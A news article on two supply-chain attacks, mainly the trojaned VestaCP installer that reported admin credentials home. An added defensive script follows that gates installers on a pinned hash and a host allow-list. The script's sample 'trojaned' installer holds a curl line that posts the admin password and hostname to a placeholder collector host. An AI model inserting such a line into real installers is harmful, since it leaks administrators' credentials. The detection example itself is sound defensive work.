https://arstechnica.com/information-technology/2018/10/two-new-supply-chain-attacks-come-to-light-in-less-than-a-week/
By DAN GOODIN
Ars Technica
10/23/2018
Most of us don't think twice about installing software or updates from a
trusted developer. We scrutinize the source site carefully to make sure
it’s legitimate, and then we let the code run on our computers without
much more thought. As developers continue to make software and webpages
harder to hack, blackhats over the past few years have increasingly
exploited this trust to spread malicious wares. Over the past week, two
such supply-chain attacks have come to light.
The first involves VestaCP, a control-panel interface that system
administrators use to manage servers. An Internet scan performed by
Censys shows that there are more than 132,000 unexpired TLS certificates
protecting VestaCP users at the moment. According to a post published last
Thursday by security firm Eset, unknown attackers compromised VestaCP
servers and used their access to make a malicious change to an installer
that was available for download.
Poisoning the source
"The VestaCP installation script was altered to report back generated
admin credentials to vestacp.com after a successful installation," Eset
Malware Researcher Marc-Etienne M.Leveille told Ars. "We don’t know
exactly when this happened, but the modified installation script was
visible in their source code management on GitHub between May 31 and June
13." VestaCP developer Serghey Rodin told Ars his organization is working
with Eset to investigate the breach to better understand the attack.
Until the investigation is complete, it remains unclear precisely how the
compromise worked. Based on Leveille's initial findings, the hack most
likely started by exploiting a critical vulnerability, either in the
VestaCP software or a server used to distribute it, that gave the
attackers root control. From there, the attackers added the
password-sniffing functions to the installation source code. VestaCP
software already contained code that sent statistical information from
user servers to the vestacp.com website.
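The attack described above worked because administrators fetched and ran an installer without a way to tell that it had been altered. The script below is an added example, not code from the article, Eset, or the VestaCP project: a small pre-install gate that refuses to run a downloaded installer unless its SHA-256 matches a value obtained out of band, and that lists every host the script would contact that is not on a short allow-list, which is exactly the kind of extra "report back" call the trojaned installer made. The two sample installers, the host names (`mirror.example.invalid`, `collector.example.invalid`) and the allow-list are constructed for the demonstration.

```shell
#!/bin/bash
# Added example (not the article's or VestaCP's code). Gate a downloaded
# installer on (1) a pinned SHA-256 and (2) an allow-list of hosts it may
# contact. All hosts and hashes here are constructed for the demo.

# Hosts the installer is expected to reach (constructed allow-list).
ALLOWED_HOSTS="mirror.example.invalid"

# verify_sha256 FILE EXPECTED_HEX -> returns 0 on match, 1 otherwise
verify_sha256() {
    local actual
    actual=$(sha256sum "$1" | awk '{print $1}')
    [ "$actual" = "$2" ]
}

# contacted_hosts FILE -> prints the unique hostnames found in http(s) URLs
contacted_hosts() {
    grep -Eo 'https?://[A-Za-z0-9._-]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# unexpected_hosts FILE -> prints hosts that are not in ALLOWED_HOSTS
unexpected_hosts() {
    local h
    for h in $(contacted_hosts "$1"); do
        case " $ALLOWED_HOSTS " in
            *" $h "*) ;;
            *) echo "$h" ;;
        esac
    done
}

# gate FILE EXPECTED_HEX -> 0 only if both checks pass; explains refusals
gate() {
    if ! verify_sha256 "$1" "$2"; then
        echo "hash mismatch: refusing to run $1" >&2
        return 1
    fi
    local bad
    bad=$(unexpected_hosts "$1")
    if [ -n "$bad" ]; then
        echo "refusing to run $1: contacts unexpected host(s): $bad" >&2
        return 1
    fi
    return 0
}

# Constructed samples: a clean installer, and a variant that adds one line
# posting the freshly generated admin password to a second host.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/clean.sh" <<'EOF'
#!/bin/bash
curl -fsSL https://mirror.example.invalid/pkg.tar.gz -o pkg.tar.gz
PASS=$(openssl rand -base64 12)
echo "admin password: $PASS"
EOF

cat > "$WORK/trojaned.sh" <<'EOF'
#!/bin/bash
curl -fsSL https://mirror.example.invalid/pkg.tar.gz -o pkg.tar.gz
PASS=$(openssl rand -base64 12)
echo "admin password: $PASS"
curl -s -d "p=$PASS&h=$(hostname)" https://collector.example.invalid/r >/dev/null
EOF

# The pinned hash would normally come from a signed release note or a
# separate channel; here it is computed from the known-good sample.
CLEAN_HASH=$(sha256sum "$WORK/clean.sh" | awk '{print $1}')

gate "$WORK/clean.sh" "$CLEAN_HASH" && echo "clean.sh: ok to run"
gate "$WORK/trojaned.sh" "$CLEAN_HASH" || echo "trojaned.sh: blocked"
```

The hash check catches any modification, but only if the pinned value comes from somewhere the attacker does not control; if the same compromised server publishes both the script and its checksum, the second check is what still surfaces the extra outbound call.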
[...]
--
Subscribe to InfoSec News
https://www.infosecnews.org/subscribe-to-infosec-news/
https://twitter.com/infosecnews_